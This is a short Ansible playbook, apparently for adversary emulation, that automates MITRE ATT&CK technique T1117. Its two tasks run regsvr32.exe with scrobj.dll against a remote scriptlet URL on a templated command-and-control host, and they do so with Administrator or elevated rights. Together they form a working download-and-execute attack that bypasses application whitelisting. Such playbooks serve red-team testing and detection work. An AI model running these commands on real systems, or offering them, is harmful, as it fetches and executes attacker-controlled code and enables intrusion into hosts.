#T1117 - Regsvr32
- name: Regsvr32 - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Run regedit.exe locally (on target node) as SYSTEM and interactively
      win_shell: |
        Start-Process cmd \"/c regsvr32.exe /s /u /i:http://{{ cnc_fqdn }}:{{ cnc_port}}/{{ cnc_sct }} scrobj.dll\" -Verb RunAs
    - name: download and execute
      win_command: |
        regsvr32.exe /s /u /i:http://{{ cnc_fqdn }}:{{ cnc_port}}/{{ cnc_sct }} scrobj.dll
      become: yes
      become_user: Administrator
